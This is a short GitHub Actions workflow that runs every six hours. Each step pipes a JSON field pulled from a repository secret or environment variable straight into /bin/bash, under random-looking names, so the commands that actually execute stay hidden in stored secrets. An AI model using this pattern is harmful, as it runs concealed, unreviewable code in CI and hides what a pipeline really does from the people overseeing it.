name: huawenshenqi

on:
  workflow_dispatch:
  schedule:
    - cron: '1 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huawenshenqi
        env:
          bunxk9423: ${{ secrets.bunxk9423 }}
        run: |
          echo $bunxk9423 | jq -r .ruvve958 | /bin/bash
          echo $y27728 | jq -r .qtd31164 | /bin/bash
          echo $n0799 | jq -r .puu8 | /bin/bash
          echo $a6935 | jq -r .fvaym60 | /bin/bash
          echo $k19442 | jq -r .ctp8355 | /bin/bash
          echo $tthv35167 | jq -r .nfint227 | /bin/bash
          echo $rgtjr58129 | jq -r .bd451 | /bin/bash

